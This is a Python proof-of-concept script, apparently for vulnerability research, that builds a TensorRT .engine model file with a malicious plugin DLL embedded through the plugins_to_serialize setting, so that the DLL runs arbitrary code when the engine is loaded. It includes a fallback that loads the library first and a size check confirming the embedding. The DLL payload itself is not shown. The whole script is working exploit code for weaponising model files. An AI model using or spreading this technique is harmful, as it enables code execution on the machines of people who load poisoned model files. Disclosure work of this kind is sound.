""" TensorRT ACE PoC - Step 1: Build a malicious .engine file with embedded plugin DLL. This script: 1. Creates a simple identity network using TensorRT's network API 2. Serializes the malicious plugin DLL into the engine file via plugins_to_serialize 3. Saves the resulting .engine file The .engine file will contain the embedded DLL that executes arbitrary code when deserialized by TensorRT. """ import os import sys import tensorrt as trt def build_malicious_engine(): PLUGIN_DLL = os.path.join(os.path.dirname(__file__), "malicious_plugin.dll") ENGINE_FILE = os.path.join(os.path.dirname(__file__), "malicious_model.engine") if not os.path.exists(PLUGIN_DLL): print(f"ERROR: Plugin DLL not found: {PLUGIN_DLL}") return False logger = trt.Logger(trt.Logger.VERBOSE) # Create builder builder = trt.Builder(logger) if builder is None: print("ERROR: Failed to create builder") return False # NOTE: We skip load_library() - just embed the DLL directly. # TensorRT reads the file from disk for plugins_to_serialize. print(f"[*] Plugin DLL: {PLUGIN_DLL} ({os.path.getsize(PLUGIN_DLL)} bytes)") # Create a simple network (identity - just input -> output) network = builder.create_network( 1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH) ) if network is None: print("ERROR: Failed to create network") return False # Add a simple identity layer input_tensor = network.add_input("input", trt.float32, (1, 3, 32, 32)) identity = network.add_identity(input_tensor) identity.get_output(0).name = "output" network.mark_output(identity.get_output(0)) print("[*] Simple identity network created") # Configure builder config = builder.create_builder_config() config.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, 1 << 20) # 1MB # KEY STEP: Serialize the malicious plugin DLL into the engine print(f"[*] Setting plugins_to_serialize: {PLUGIN_DLL}") config.plugins_to_serialize = [PLUGIN_DLL] # Build the serialized network print("[*] Building engine (this may take a moment)...") serialized_engine = builder.build_serialized_network(network, config) if serialized_engine is None: print("ERROR: Failed to build serialized engine") print("[*] Trying approach 2: load_library first, then serialize...") # Approach 2: load the library first (this triggers DllMain during build) registry = builder.get_plugin_registry() handle = registry.load_library(PLUGIN_DLL) print(f"[*] load_library result: {handle}") # Rebuild builder2 = trt.Builder(logger) network2 = builder2.create_network( 1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH) ) input_tensor2 = network2.add_input("input", trt.float32, (1, 3, 32, 32)) identity2 = network2.add_identity(input_tensor2) identity2.get_output(0).name = "output" network2.mark_output(identity2.get_output(0)) config2 = builder2.create_builder_config() config2.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, 1 << 20) config2.plugins_to_serialize = [PLUGIN_DLL] serialized_engine = builder2.build_serialized_network(network2, config2) if serialized_engine is None: print("ERROR: Still failed to build engine") return False engine_size = serialized_engine.nbytes print(f"[+] Engine built successfully! Size: {engine_size} bytes") # Check if engine is larger than expected (should contain the DLL) dll_size = os.path.getsize(PLUGIN_DLL) print(f"[*] Plugin DLL size: {dll_size} bytes") if engine_size > dll_size: print(f"[+] Engine is larger than DLL - DLL likely embedded!") else: print(f"[-] Engine seems too small - DLL might not be embedded") # Save the engine with open(ENGINE_FILE, "wb") as f: f.write(bytes(serialized_engine)) print(f"[+] Malicious engine saved to: {ENGINE_FILE}") return True if __name__ == "__main__": # Clean up proof file before build proof = os.path.join(os.path.dirname(__file__), "PWNED.txt") if os.path.exists(proof): os.remove(proof) success = build_malicious_engine() if success: print("\n[+] STEP 1 COMPLETE: Malicious engine built.") print("[*] Next: Run load_malicious_engine.py to test ACE") else: print("\n[-] STEP 1 FAILED") sys.exit(0 if success else 1)